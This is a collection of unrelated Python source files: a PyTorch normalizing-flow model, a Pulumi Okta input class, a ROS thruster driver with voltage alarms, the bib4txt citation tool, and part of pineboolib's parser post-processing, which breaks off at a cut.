import torch import torch.nn as nn import torchvision.transforms as T from .MADE import MADE from .Shuffle import Shuffle from .Flow import SequentialConditionalFlow from .NormFunctions import ActNorm, RunningBatchNorm1d from utils.logger import log class MAF(nn.Module): def __init__(self, flow_dim, condition_dim, hidden_dim, num_blocks, device): super(MAF, self).__init__() self.flow_dim = flow_dim self.condition_dim = condition_dim self.hidden_dim = hidden_dim self.device = device self.model = SequentialConditionalFlow(sum( [[MADE(flow_dim, condition_dim, hidden_dim, ind == 0), RunningBatchNorm1d(flow_dim), ActNorm(flow_dim), Shuffle(torch.randperm(flow_dim))] \ for ind in range(num_blocks - 1)] \ + [[MADE(flow_dim, condition_dim, hidden_dim, False)]], [])) self.model.to(device) self.prior = torch.distributions.Normal(torch.tensor(0., device=device), torch.tensor(1., device=device)) self.initialized = True def calc_loss(self, inputs, conditions): raise NotImplementedError def forward_flow(self, inputs, conditions): in_shape = inputs.shape inputs = inputs.reshape(-1, self.flow_dim) conditions = conditions.reshape(inputs.shape[0], self.condition_dim) if not self.initialized and inputs.shape[0] != 1: # hack todo fix? with torch.no_grad(): self.model.data_init(inputs, conditions) self.initialized = True z, logjac = self.model.forward_flow(inputs, conditions) return z.reshape(in_shape), logjac.reshape(in_shape[:-1]) def sample(self, conditions): batch_size = conditions.shape[0] with torch.no_grad(): z = self.prior.sample([batch_size, self.flow_dim]) x, _ = self.model.inverse_flow(z, conditions) return x def save(self, path): torch.save({ "model": self.model.state_dict(), "optimizer": self.optimizer.state_dict(), }, path) def load(self, path): state_dict = torch.load(path, map_location=self.device) self.model.load_state_dict(state_dict["model"]) self.optimizer.load_state_dict(state_dict["optimizer"]) """ uniform noise to dequantize input logit(a + (1 - 2a) * image) as in paper """ class MAFImageTransform(): def __init__(self, dataset): if dataset == "mnist": self.base_transform = T.Compose([T.ToTensor(), T.RandomHorizontalFlip()]) self.alpha = 0.01 else: raise AttributeError("Unknown dataset") def __call__(self, image): image = self.base_transform(image) noise = (torch.rand_like(image) - 0.5) * (1/256.) image = (image + noise).clip(0., 1.) return torch.logit(self.alpha + (1 - 2 * self.alpha) * image)
2.03125
2
sdk/python/pulumi_okta/profile/_inputs.py
brinnehlops/pulumi-okta
0
12796586
# coding=utf-8 # *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** import warnings import pulumi import pulumi.runtime from typing import Any, Dict, List, Mapping, Optional, Tuple, Union from .. import _utilities, _tables __all__ = [ 'MappingMappingArgs', ] @pulumi.input_type class MappingMappingArgs: def __init__(__self__, *, expression: pulumi.Input[str], id: pulumi.Input[str], push_status: Optional[pulumi.Input[str]] = None): pulumi.set(__self__, "expression", expression) pulumi.set(__self__, "id", id) if push_status is not None: pulumi.set(__self__, "push_status", push_status) @property @pulumi.getter def expression(self) -> pulumi.Input[str]: return pulumi.get(self, "expression") @expression.setter def expression(self, value: pulumi.Input[str]): pulumi.set(self, "expression", value) @property @pulumi.getter def id(self) -> pulumi.Input[str]: return pulumi.get(self, "id") @id.setter def id(self, value: pulumi.Input[str]): pulumi.set(self, "id", value) @property @pulumi.getter(name="pushStatus") def push_status(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "push_status") @push_status.setter def push_status(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "push_status", value)
1.992188
2
deprecated/drivers/sub8_videoray_m5_thruster/nodes/thruster_driver.py
ericgorday/SubjuGator
27
12796587
#!/usr/bin/env python import numpy as np import copy import rospy import rospkg import rosparam import threading import argparse from geometry_msgs.msg import Vector3 from std_msgs.msg import Header, Float64 from sub8_msgs.msg import Thrust, ThrusterStatus from mil_ros_tools import wait_for_param, thread_lock, numpy_to_point from sub8_msgs.srv import ThrusterInfo, ThrusterInfoResponse, FailThruster, UnfailThruster from sub8_thruster_comm import thruster_comm_factory from ros_alarms import AlarmBroadcaster, AlarmListener lock = threading.Lock() class BusVoltageMonitor(object): ''' Class that estimates sub8's thruster bus voltage. As of May 2017, this is just a simple rolling average with a constant width sliding window. However add_reading and get_estimate methods are left for when smarter filtering is needed ''' VMAX = 50 # volts VMIN = 0 # volts class VoltageReading(object): def __init__(self, voltage, time): self.v = voltage self.t = time def __init__(self, window_duration): ''' window_duration - float (amount of seconds for which to keep a reading in the buffer) ''' self.bus_voltage_alarm = AlarmBroadcaster("bus-voltage") self.bus_voltage_pub = rospy.Publisher('bus_voltage', Float64, queue_size=1) self.warn_voltage = rospy.get_param("/battery/warn_voltage", 44.5) self.kill_voltage = rospy.get_param("/battery/kill_voltage", 44.0) self.last_estimate_time = rospy.Time.now() self.WINDOW_DURATION = rospy.Duration(window_duration) self.ESTIMATION_PERIOD = rospy.Duration(0.2) self.cached_severity = 0 self.buffer = [] def add_reading(self, voltage, time): ''' Adds voltage readings to buffer ''' voltage = float(voltage) # Only add if it makes sense (the M5's will give nonsense feedback at times) if voltage >= self.VMIN and voltage <= self.VMAX: self.buffer.append(self.VoltageReading(voltage, time)) self.prune_buffer() # check bus voltage if enough time has passed if rospy.Time.now() - self.last_estimate_time > self.ESTIMATION_PERIOD: self.check_bus_voltage() def prune_buffer(self): ''' Removes readings older than the window_duration from buffer ''' for reading in self.buffer: age = rospy.Time.now() - reading.t if age > self.WINDOW_DURATION: self.buffer.remove(reading) def get_voltage_estimate(self): ''' Returns average voltage in buffer ''' voltages = [] if len(self.buffer) == 0: return None for r in self.buffer: voltages.append(r.v) return np.mean(voltages) def check_bus_voltage(self): ''' Publishes bus_voltage estimate and raises alarm if necessary ''' bus_voltage = self.get_voltage_estimate() if bus_voltage is None: return self.bus_voltage_pub.publish(Float64(bus_voltage)) severity = None if bus_voltage < self.warn_voltage: severity = 3 if bus_voltage < self.kill_voltage: severity = 5 if severity is not None and self.cached_severity != severity: self.bus_voltage_alarm.raise_alarm( problem_description='Bus voltage has fallen to {}'.format(bus_voltage), parameters={'bus_voltage': bus_voltage}, severity=severity ) self.cached_severity = severity class ThrusterDriver(object): _dropped_timeout = 1.0 # s _window_duration = 30.0 # s _NODE_NAME = rospy.get_name() def __init__(self, ports_layout, thruster_definitions): '''Thruster driver, an object for commanding all of the sub's thrusters - Gather configuration data and make it available to other nodes - Instantiate ThrusterPorts, (Either simulated or real), for communicating with thrusters - Track a thrust_dict, which maps thruster names to the appropriate port - Given a command message, route that command to the appropriate port/thruster - Send a thruster status message describing the status of the particular thruster ''' self.failed_thrusters = set() # This is only determined by comms self.deactivated_thrusters = set() # These will not come back online even if comms are good (user managed) # Alarms self.thruster_out_alarm = AlarmBroadcaster("thruster-out") AlarmListener("thruster-out", self.check_alarm_status, call_when_raised=False) # Prevent outside interference # Create ThrusterPort objects in a dict indexed by port name self.load_thruster_ports(ports_layout, thruster_definitions) # Feedback on thrusters (thruster mapper blocks until it can use this service) self.thruster_info_service = rospy.Service('thrusters/thruster_info', ThrusterInfo, self.get_thruster_info) self.status_publishers = {name: rospy.Publisher('thrusters/status/' + name, ThrusterStatus, queue_size=10) for name in self.thruster_to_port_map.keys()} # These alarms require this service to be available before things will work rospy.wait_for_service("update_thruster_layout") self.update_thruster_out_alarm() # Bus voltage self.bus_voltage_monitor = BusVoltageMonitor(self._window_duration) # Command thrusters self.thrust_sub = rospy.Subscriber('thrusters/thrust', Thrust, self.thrust_cb, queue_size=1) # To programmatically deactivate thrusters self.fail_thruster_server = rospy.Service('fail_thruster', FailThruster, self.fail_thruster) self.unfail_thruster_server = rospy.Service('unfail_thruster', UnfailThruster, self.unfail_thruster) @thread_lock(lock) def load_thruster_ports(self, ports_layout, thruster_definitions): ''' Loads a dictionary ThrusterPort objects ''' self.ports = {} # ThrusterPort objects self.thruster_to_port_map = {} # node_id to ThrusterPort rospack = rospkg.RosPack() self.make_fake = rospy.get_param('simulate', False) if self.make_fake: rospy.logwarn("Running fake thrusters for simulation, based on parameter '/simulate'") # Instantiate thruster comms port for port_info in ports_layout: port_name = port_info['port'] self.ports[port_name] = thruster_comm_factory(port_info, thruster_definitions, fake=self.make_fake) # Add the thrusters to the thruster dict and configure if present for thruster_name in port_info['thruster_names']: self.thruster_to_port_map[thruster_name] = port_info['port'] if thruster_name not in self.ports[port_name].online_thruster_names: rospy.logerr("ThrusterDriver: {} IS MISSING!".format(thruster_name)) else: rospy.loginfo("ThrusterDriver: {} registered".format(thruster_name)) # Set firmware settings port = self.ports[port_name] node_id = thruster_definitions[thruster_name]['node_id'] config_path = (rospack.get_path('sub8_videoray_m5_thruster') + '/config/firmware_settings/' + thruster_name + '.yaml') rospy.loginfo('Configuring {} with settings specified in {}.'.format(thruster_name, config_path)) port.set_registers_from_dict(node_id=node_id, reg_dict=rosparam.load_file(config_path)[0][0]) port.reboot_thruster(node_id) # Necessary for some settings to take effect def get_thruster_info(self, srv): ''' Get the thruster info for a particular thruster name ''' query_name = srv.thruster_name info = self.ports[self.thruster_to_port_map[query_name]].thruster_info[query_name] thruster_info = ThrusterInfoResponse( node_id=info.node_id, min_force=info.thrust_bounds[0], max_force=info.thrust_bounds[1], position=numpy_to_point(info.position), direction=Vector3(*info.direction) ) return thruster_info def check_alarm_status(self, alarm): # If someone else cleared this alarm, we need to make sure to raise it again if not alarm.raised and alarm.node_name != self._NODE_NAME: self.update_thruster_out_alarm() def update_thruster_out_alarm(self): ''' Raises or clears the thruster out alarm Updates the 'offline_thruster_names' parameter accordingly Sets the severity to the number of failed thrusters (clipped at 5) ''' offline_names = list(self.failed_thrusters) if len(self.failed_thrusters) > 0: self.thruster_out_alarm.raise_alarm( node_name=self._NODE_NAME, parameters={'offline_thruster_names': offline_names}, severity=int(np.clip(len(self.failed_thrusters), 1, 5))) else: self.thruster_out_alarm.clear_alarm( node_name=self._NODE_NAME, parameters={'offline_thruster_names': offline_names}) @thread_lock(lock) def command_thruster(self, name, thrust): ''' Issue a a force command (in Newtons) to a named thruster Example names are BLR, FLH, etc. Raises RuntimeError if a thrust value outside of the configured thrust bounds is commanded Raises UnavailableThrusterException if a thruster that is offline is commanded a non-zero thrust ''' port_name = self.thruster_to_port_map[name] target_port = self.ports[port_name] thruster_model = target_port.thruster_info[name] if thrust < thruster_model.thrust_bounds[0] or thrust > thruster_model.thrust_bounds[1]: rospy.logwarn('Tried to command thrust ({}) outside of physical thrust bounds ({})'.format( thrust, thruster_model.thrust_bounds)) if name in self.failed_thrusters: if not np.isclose(thrust, 0): rospy.logwarn('ThrusterDriver: commanding non-zero thrust to offline thruster (' + name + ')') effort = target_port.thruster_info[name].get_effort_from_thrust(thrust) # We immediately get thruster_status back thruster_status = target_port.command_thruster(name, effort) # Keep track of thrusters going online or offline offline_on_port = target_port.get_offline_thruster_names() for offline in offline_on_port: if offline not in self.failed_thrusters: self.failed_thrusters.add(offline) # Thruster went offline for failed in copy.deepcopy(self.failed_thrusters): if (failed in target_port.get_declared_thruster_names() and failed not in offline_on_port and failed not in self.deactivated_thrusters): self.failed_thrusters.remove(failed) # Thruster came online # Don't try to do anything if the thruster status is bad if thruster_status is None: return message_contents = [ 'rpm', 'bus_v', 'bus_i', 'temp', 'fault', 'command_tx_count', 'status_rx_count', 'command_latency_avg' ] message_keyword_args = {key: thruster_status[key] for key in message_contents} power = thruster_status['bus_v'] * thruster_status['bus_i'] self.status_publishers[name].publish( ThrusterStatus( header=Header(stamp=rospy.Time.now()), name=name, node_id=thruster_model.node_id, power=power, effort=effort, thrust=thrust, **message_keyword_args ) ) # Will publish bus_voltage and raise alarm if necessary self.bus_voltage_monitor.add_reading(message_keyword_args['bus_v'], rospy.Time.now()) # Undervolt/overvolt faults are unreliable (might not still be true - David) if message_keyword_args['fault'] > 2: fault_codes = { (1 << 0): 'UNDERVOLT', (1 << 1): 'OVERRVOLT', (1 << 2): 'OVERCURRENT', (1 << 3): 'OVERTEMP', (1 << 4): 'STALL', (1 << 5): 'STALL_WARN', } fault = int(message_keyword_args['fault']) faults = [] for code, fault_name in fault_codes.items(): if code & fault != 0: faults.append(fault_name) rospy.logwarn("Thruster: {} has entered fault with status {}".format(name, message_keyword_args)) rospy.logwarn("Fault causes are: {}".format(faults)) return def thrust_cb(self, msg): ''' Callback for receiving thrust commands These messages contain a list of instructions, one for each thruster If there are any updates to the list of failed thrusters, it will raise and alarm ''' failed_before = {x for x in self.failed_thrusters} for thrust_cmd in list(msg.thruster_commands): self.command_thruster(thrust_cmd.name, thrust_cmd.thrust) # Raise or clear 'thruster-out' alarm if not self.failed_thrusters == failed_before: rospy.logdebug('Failed thrusters:', self.failed_thrusters) self.update_thruster_out_alarm() def stop(self): ''' Commands 0 thrust to all thrusters ''' for port in self.ports.values(): for thruster_name in port.online_thruster_names.copy(): self.command_thruster(thruster_name, 0.0) def fail_thruster(self, srv): ''' Makes a thruster unavailable for thrust allocation ''' # So that thrust is not allocated to the thruster self.failed_thrusters.add(srv.thruster_name) # So that it won't come back online even if comms are good self.deactivated_thrusters.add(srv.thruster_name) # So that thruster_mapper updates the B-matrix self.update_thruster_out_alarm() return {} def unfail_thruster(self, srv): ''' Undoes effect of self.fail_thruster ''' self.failed_thrusters.remove(srv.thruster_name) self.deactivated_thrusters.remove(srv.thruster_name) self.update_thruster_out_alarm() return {} if __name__ == '__main__': PKG = 'sub8_videoray_m5_thruster' usage_msg = "Interface to Sub8's VideoRay M5 thrusters" desc_msg = "Specify a path to the configuration.json file containing the thrust calibration data" parser = argparse.ArgumentParser(usage=usage_msg, description=desc_msg) args = parser.parse_args(rospy.myargv()[1:]) rospy.init_node('videoray_m5_thruster_driver') layout_parameter = '/thruster_layout' rospy.loginfo("Thruster Driver waiting for parameter, {}".format(layout_parameter)) thruster_layout = wait_for_param(layout_parameter) if thruster_layout is None: raise IOError('/thruster_layout rosparam needs to be set before launching the thruster driver') thruster_driver = ThrusterDriver(thruster_layout['thruster_ports'], thruster_layout['thrusters']) rospy.spin()
2.515625
3
scripts/bib4txt.py
cpitclaudel/bibstuff
9
12796588
<filename>scripts/bib4txt.py #!/usr/bin/env python # bib4txt.py """ Creates formatted references for a text document. Uuseful for reStructuredText documents. Interacts with a Bibtex-style database file (without using LaTeX or bibtex). Dependencies: - Python 2.4 or higher - SimpleParse (binaries available!) - BibStuff (which you should have if you have this) The source text file should include citation references in reStructuredText format: http://docutils.sourceforge.net/docs/user/rst/quickref.html#citations Roughly: a citation key enclosed in brackets, followed by an underscore. Citation keys cannot be all digits. The source document can be output with formatted citation references substituted for the citation keys. In this case, the reference list is added to the end of the file. A slight modification of the reStructuredText ``cite`` directive is currently allowed: - Most characters are permitted. E.g., ``[Schwilk+Isaac:2006]_`` is now (2008) legal in reST and will be recognized by bib4txt. - Comma separted multiple keys are permitted in a cite: e.g., ``[Schwilk1999,Isaac2000]_`` This is *not* legal reST. The intent is for the formatted references to be written to a separate file. You can then include this in your reST document with an ``include`` directive. How it works: - Uses SimpleParse_ to convert an EBNF_ grammar into an object for scanning reST files for citation references. - Uses SimpleParse_ to convert an EBNF_ grammar into an object for scanning .bib files. (See Bibstuff's bibgrammar.py.) - Extracts the citation references from the input document. - Outputs a sorted list of citation definitions, to be used in the References section of your documents. :author: <NAME> :date: 2006-07-27 :contact: http://www.american.edu/cas/econ/faculty/isaac/isaac1.htm :copyright: 2006 by <NAME> :license: MIT (see `license.txt`_) :note: now allows multiple database (.bib) files :note: bib4txt supercedes addrefs.py, by <NAME> :note: Python 2.4 dependencies: sets, sorted :note: Python 2.6 dependencies: with :TODO: address the TODOs in the associate BibStuff files, especially in bibstyles/shared.py .. _EBNF: http://www.garshol.priv.no/download/text/bnf.html .. _SimpleParse: http://simpleparse.sourceforge.net/ .. _`license.txt`: ../license.txt """ __docformat__ = "restructuredtext en" __version__ = "1.1.4" __needs__ = '2.7+' ################### IMPORTS ################################################## #import from standard library import importlib, os, sys import logging logging.basicConfig(format='\n%(levelname)s:\n%(message)s\n') bib4txt_logger = logging.getLogger('bibstuff_logger') #import dependencies import simpleparse #local imports try: from bibstuff import bibfile, bibgrammar, bibstyles, ebnf_sp except ImportError: #hack to allow user to run without installing scriptdir = os.path.dirname(os.path.realpath(__file__)) bibdir = os.path.dirname(scriptdir) sys.path.insert(0, bibdir) from bibstuff import bibfile, bibgrammar, bibstyles, ebnf_sp ################################################################################ ################### GLOBALS ################################################## # some globals are set when this file is run as a script # style # bibfile_processor # note that the standard separator for multiple keys in one citation reference is a comma # CITATION_SEP = ',' # set in styles/shared.py def make_text_output(src_as_string, src_parser, parsed_bibfile, style, # imported style module citations_only=True): """Create intext citations and the bibliography""" #first: create a citation manager to handle the bibfile(s) bib4txt_logger.debug('create citation manager') citation_manager = style.CitationManager([parsed_bibfile], citekeys=None, citation_template=style.CITATION_TEMPLATE) #second: create CiteRefProcessor object to process cites during src parsing # (and associate it with the citation_manager) bib4txt_logger.debug('create cite processor') cite_processor = bibstyles.shared.CiteRefProcessor(citation_manager) #third: parse the text (ignore `taglist`; it is a dummy container) bib4txt_logger.info('fill cite processor with keys') taglist = src_parser.parse(src_as_string, processor=cite_processor) """ :note: Now cite_processor.all_citekeys holds the cite keys. It is also associated with citation_manager which holds the bibliography, so we can make a sorted entry list. To do so need: - the keys for the citations referenced - a sort-key on which to base the sorting :note: Sorting is style dependent---e.g., might sort entries on citation_rank. """ #set the citation manager citekeys to all found keys (an ordered list) #citation_manager.citekeys = cite_processor.all_citekeys #make the citation definitions for a list of References bib4txt_logger.info('make citations') result = citation_manager.make_citations() #lastly, prepend the entire document, if desired if not citations_only: result = cite_processor.__repr__() + result return result+'\n' # ds added newline 2008-06-27 ################################################################################ def bibfiles2string(bibfile_names): bibfiles_as_strings = list() for bibfile_name in bibfile_names: if (os.path.splitext(bibfile_name)[-1]).lower() != ".bib": bib4txt_logger.warning("%s does not appear to be a .bib file."%bibfile_name ) try: with open(bibfile_name,'r') as fh: bibfiles_as_strings.append( fh.read() ) except IOError: bib4txt_logger.warning("%s not found."%bibfile_name ) return '\n'.join( bibfiles_as_strings ) def main(): """Command-line tool. See bib4txt.py -h for help. """ #set default input and output _infile = sys.stdin _outfile = sys.stdout from argparse import ArgumentParser _usage = """ usage: %(prog)s [options] BIB_DATABASE standard usage: %(prog)s -i reST_FILE -n -o refs_FILE BIB_DATABASE """ parser = ArgumentParser(usage=_usage) parser.add_argument('--version', action='version', version=__version__) parser.add_argument("-i", "--infile", action="store", dest="infile", help="Parse FILE for citation references.", metavar="FILE") parser.add_argument("-o", "--outfile", action="store", dest="outfile", help="Write formatted references to FILE", metavar="FILE") parser.add_argument("-n", "--nuke", action="store_true", dest="overwrite", default=False, help="silently overwrite outfile, default=%(default)s") parser.add_argument("-F", "--stylefile", action="store", dest="stylefile", default="default.py", help="Specify user-chosen style file",metavar="FILE") parser.add_argument("-s", "--style", action="store", dest="style", default="default", help="Specify user-chosen style (by style name).") #parser.add_argument("-v", "--verbose", action="store_true", dest="verbose", default=False, help="Print INFO messages to stdout, default=%(default)s") parser.add_argument("-V", "--verbosity", action="store", type=int, dest="verbosity", default=0, help="2: print DEBUG messages; 1: print INFO messages; default=%(default)s") parser.add_argument("-a", "--all", action="store_true", dest="entire_doc", default=False, help="Output entire document, making citation reference substitutions, default=%(default)s") parser.add_argument("-x", "--xp", action="store_true", dest="xp_parse", default=False, help="Use experimental document parser, default=%(default)s") parser.add_argument("-L", "--logger-level", action="store", type=int, dest="logger_level", help="Set logging level to integer value.") parser.add_argument("bibfiles", action="store", nargs='*', help="The .bib files for the references.") args = parser.parse_args() if args.logger_level: bib4txt_logger.setLevel(args.logger_level) elif 2==args.verbosity: bib4txt_logger.setLevel(logging.DEBUG) elif 1==args.verbosity: bib4txt_logger.setLevel(logging.INFO) if args.stylefile != "default.py": bib4txt_logger.info("It is currently recommended to pass styles with the -s option.") stylename = os.path.splitext(args.stylefile)[0] else: stylename = args.style if "." in stylename: bib4txt_logger.warn("use the -f option to pass a style by filename") stylename = os.path.splitext(stylename)[0] bib4txt_logger.info( "\n".join([ "Script running:", " bibfiles=%s", " infile=%s", " outfile=%s", " style=%s" ])%(args.bibfiles, args.infile, args.outfile, stylename) ) #import a bibliography style based on `stylefile` command-line option #TODO: add error handling for unknown styles style = importlib.import_module('bibstuff.bibstyles.%s'%stylename) """ str2exec = "import bibstuff.bibstyles.%s as style"%stylename workaround = {} #work around Python 2 exec vs Python 3 exec exec(str2exec, {}, workaround) style = workaround['style'] #exec("import bibstuff.bibstyles.%s as style"%os.path.splitext(args.stylefile)[0]) """ # open output file for writing (default: stdout) if args.outfile: if os.path.exists(args.outfile) and not args.overwrite: _msg = """ABORTED because output file %s already exists: Use -n option to nuke (overwrite) this file. PLEASE CHECK FILE NAME CAREFULLY! """%(args.outfile) print(_msg) sys.exit(1) _outfile = open(args.outfile,'w') # read database (.bib) files bibfile_names = args.bibfiles bibfile_as_string = bibfiles2string(bibfile_names) if not bibfile_as_string: bib4txt_logger.warning("No BibTeX databases found.") sys.exit(1) # read input file (default: stdin) if args.infile: try: _infile = open(args.infile, mode='r', encoding='utf-8') except TypeError: #Python 2 did not accept encoding arg _infile = open(args.infile, mode='r') except: raise ValueError("Cannot open: "+args.infile) if args.entire_doc: ebnf_dec = ebnf_sp.cites_rest else: ebnf_dec = ebnf_sp.cites_only_rest if args.xp_parse: ebnf_dec = ebnf_sp.cites_xp # Create a simpleparse.parser Parser based on the chosen grammar cite_parser = simpleparse.parser.Parser(ebnf_dec, root='src') # create object to store parsed .bib file bibfile_processor = bibfile.BibFile() bib4txt_logger.debug('Ready to parse bib file.') #store parsed .bib files in the bibfile_processor bibgrammar.Parse(bibfile_as_string, bibfile_processor) bib4txt_logger.info('bib file parsed.') result = make_text_output( _infile.read(), cite_parser, bibfile_processor, style, citations_only = not args.entire_doc) _outfile.write(result) _outfile.close() _infile.close() if __name__ == '__main__': main()
2.53125
3
pineboolib/flparser/postparse.py
Miguel-J/pineboo-buscar
0
12796589
<reponame>Miguel-J/pineboo-buscar<filename>pineboolib/flparser/postparse.py<gh_stars>0 #!/usr/bin/python from builtins import str from builtins import object from optparse import OptionParser import os import os.path import sys import imp import traceback from lxml import etree try: from pineboolib.flparser import flscriptparse except ImportError: import flscriptparse USEFUL_TOKENS = "ID,ICONST,FCONST,SCONST,CCONST,RXCONST".split(",") KNOWN_PARSERS = {} UNKNOWN_PARSERS = {} def parse_for(*tagnames): global KNOWN_PARSERS def decorator(fn): for n in tagnames: KNOWN_PARSERS[n] = fn return fn return decorator def parse(tagname, treedata): global KNOWN_PARSERS, UNKNOWN_PARSERS if tagname not in KNOWN_PARSERS: UNKNOWN_PARSERS[tagname] = 1 fn = parse_unknown else: fn = KNOWN_PARSERS[tagname] return fn(tagname, treedata) def getxmltagname(tagname): if tagname == "source": return "Source" if tagname == "funcdeclaration": return "Function" if tagname == "classdeclaration": return "Class" if tagname == "vardeclaration": return "Variable" return "Unknown.%s" % tagname xml_class_types = [] class TagObjectFactory(type): def __init__(cls, name, bases, dct): global xml_class_types xml_class_types.append(cls) super(TagObjectFactory, cls).__init__(name, bases, dct) class TagObject(object, metaclass=TagObjectFactory): tags = [] set_child_argn = False name_is_first_id = False debug_other = True adopt_childs_tags = [] omit_tags = ['empty'] callback_subelem = {} promote_child_if_alone = False @classmethod def tagname(self, tagname): return self.__name__ @classmethod def can_process_tag(self, tagname): return tagname in self.tags def __init__(self, tagname): self.astname = tagname self.xml = etree.Element(self.tagname(tagname)) self.xmlname = None self.subelems = [] self.values = [] if self.name_is_first_id: self.xml.set("name", "") def adopt_children(self, argn, subelem): for child in subelem.xml.iterchildren(): if self.set_child_argn: child.set("argn", str(argn)) else: if 'argn' in child.attrib: del child.attrib['argn'] self.xml.append(child) def omit_subelem(self, argn, subelem): return def is_in(self, listobj): return self.__class__ in listobj or self.astname in listobj def get(self, listobj, default=None): if self.__class__ in listobj: return listobj[self.__class__] if self.astname in listobj: return listobj[self.astname] return default def add_subelem(self, argn, subelem): if subelem.is_in(self.omit_tags): return self.omit_subelem(argn, subelem) if subelem.is_in(self.adopt_childs_tags): return self.adopt_children(argn, subelem) callback = subelem.get(self.callback_subelem) if callback: return getattr(self, callback)(argn, subelem) if self.set_child_argn: subelem.xml.set("argn", str(argn)) self.xml.append(subelem.xml) self.subelems.append(subelem) def add_value(self, argn, vtype, value): self.values.append((vtype, value)) if vtype == "ID" and self.name_is_first_id and self.xmlname is None: self.xmlname = value self.xml.set("name", value) return self.xml.set("arg%02d" % argn, vtype + ":" + repr(value)) def add_other(self, argn, vtype, data): if self.debug_other: self.xml.set("arg%02d" % argn, vtype) def polish(self): if self.promote_child_if_alone: if len(self.values) == 0 and len(self.subelems) == 1: return self.subelems[0] return self class ListObject(TagObject): set_child_argn = False debug_other = False class NamedObject(TagObject): name_is_first_id = True debug_other = False class ListNamedObject(TagObject): name_is_first_id = True set_child_argn = False debug_other = False class TypedObject(ListObject): type_arg = 0 def add_other(self, argn, vtype, value): if argn == self.type_arg: self.xml.set("type", vtype) class Source(ListObject): tags = ["source", "basicsource", "classdeclarationsource", "statement_list", "statement_block"] adopt_childs_tags = ['source_element', 'statement_list', 'statement', "statement_block"] class Identifier(NamedObject): tags = ["identifier", "optid"] def polish(self): if self.xmlname is None: self.astname = "empty" return self class Arguments(ListObject): tags = ["arglist"] adopt_childs_tags = ['vardecl_list'] class VariableType(NamedObject): tags = ["optvartype"] def polish(self): if self.xmlname is None: self.astname = "empty" return self class ExtendsType(NamedObject): tags = ["optextends"] def polish(self): if self.xmlname is None: self.astname = "empty" return self class Function(ListNamedObject): tags = ["funcdeclaration"] callback_subelem = ListNamedObject.callback_subelem.copy() callback_subelem[VariableType] = "add_vartype" def add_vartype(self, argn, subelem): self.xml.set("returns", str(subelem.xmlname)) class FunctionAnon(ListObject): tags = ["funcdeclaration_anon"] class FunctionAnonExec(ListObject): tags = ["funcdeclaration_anon_exec"] class Variable(NamedObject): tags = ["vardecl"] callback_subelem = NamedObject.callback_subelem.copy() callback_subelem[VariableType] = "add_vartype" def add_vartype(self, argn, subelem): self.xml.set("type", str(subelem.xmlname)) class DeclarationBlock(ListObject): tags = ["vardeclaration"] adopt_childs_tags = ['vardecl_list'] def add_other(self, argn, vtype, value): if argn == 0: self.xml.set("mode", vtype) def polish(self): # if len(self.values) == 0 and len(self.subelems) == 1: # self.subelems[0].xml.set("mode",self.xml.get("mode")) # return self.subelems[0] return self class Class(ListNamedObject): tags = ["classdeclaration"] callback_subelem = ListNamedObject.callback_subelem.copy() callback_subelem[ExtendsType] = "add_exttype" def add_exttype(self, argn, subelem): self.xml.set("extends", str(subelem.xmlname)) class Member(TagObject): debug_other = False set_child_argn = False tags = ["member_var", "member_call"] adopt_childs_tags = ['varmemcall', "member_var", "member_call"] class ArrayMember(TagObject): debug_other = False set_child_argn = False tags = ["array_member"] adopt_childs_tags = ['variable_1', "func_call"] class InstructionCall(TagObject): debug_other = False tags = ["callinstruction"] class InstructionStore(TagObject): promote_child_if_alone = True debug_other = False tags = ["storeinstruction"] class InstructionFlow(TypedObject): debug_other = True tags = ["flowinstruction"] class Instruction(TagObject): promote_child_if_alone = True debug_other = False tags = ["instruction"] class OpMath(TypedObject): debug_other = True tags = ["mathoperator"] class Compare(TypedObject): debug_other = True tags = ["cmp_symbol", "boolcmp_symbol"] class FunctionCall(NamedObject): tags = ["funccall_1"] class CallArguments(ListObject): tags = ["callargs"] class Constant(ListObject): tags = ["constant"] def add_value(self, argn, vtype, value): value = str(value) # str(value,"ISO-8859-15","replace") if vtype == "SCONST": vtype = "String" value = value[1:-1] self.xml.set("delim", '"') if vtype == "CCONST": vtype = "String" value = value[1:-1] self.xml.set("delim", "'") if vtype == "RCONST": vtype = "Regex" if vtype == "ICONST": vtype = "Number" if vtype == "FCONST": vtype = "Number" self.const_value = value self.const_type = vtype self.xml.set("type", vtype) self.xml.set("value", value) class InlineUpdate(ListObject): tags = ["inlinestoreinstruction"] def add_other(self, argn, vtype, value): self.xml.set("type", vtype) if argn == 0: self.xml.set("mode", "update-read") if argn == 1: self.xml.set("mode", "read-update") class If(ListObject): tags = ["ifstatement"] class Condition(ListObject): tags = ["condition"] class Else(ListObject): tags = ["optelse"] def polish(self): if len(self.subelems) == 0: self.astname = "empty" return self class DictObject(ListObject): tags = ["dictobject_value_elemlist", "dictobject_value"] adopt_childs_tags = ['dictobject_value_elemlist', "dictobject_value"] class DictElem(ListObject): tags = ["dictobject_value_elem"] class ExpressionContainer(ListObject): tags = ["expression"] # adopt_childs_tags = ['base_expression'] def polish(self): if len(self.values) == 0 and len(self.subelems) == 1: # if isinstance(self.subelems[0], Constant): if self.subelems[0].xml.tag == "base_expression": self.subelems[0].xml.tag = "Expression" return self.subelems[0] else: self.xml.tag = "Value" return self class InstructionUpdate(ListObject): tags = ["updateinstruction"] class Switch(ListObject): tags = ["switch"] adopt_childs_tags = ['case_cblock_list', 'case_block_list'] class CaseList(ListObject): tags = ["case_block_list"] adopt_childs_tags = ['case_cblock_list', 'case_block_list'] class Case(ListObject): tags = ["case_block"] class CaseDefault(ListObject): tags = ["case_default"] class While(ListObject): tags = ["whilestatement"] class For(ListObject): tags = ["forstatement"] class ForInitialize(ListObject): tags = ["for_initialize"] class ForCompare(ListObject): tags = ["for_compare"] class ForIncrement(ListObject): tags = ["for_increment"] class DoWhile(ListObject): tags = ["dowhilestatement"] class ForIn(ListObject): tags = ["forinstatement"] class With(ListObject): tags = ["withstatement"] class TryCatch(ListObject): tags = ["trycatch"] class New(ListObject): tags = ["new_operator"] class Delete(ListObject): tags = ["deleteinstruction"] class Parentheses(ListObject): tags = ["parentheses"] adopt_childs_tags = ['base_expression'] class OpUnary(TypedObject): tags = ["unary_operator"] class OpTernary(ListObject): tags = ["ternary_operator"] class OpUpdate(TypedObject): tags = ["updateoperator"] # ----- keep this one at the end. class Unknown(TagObject): 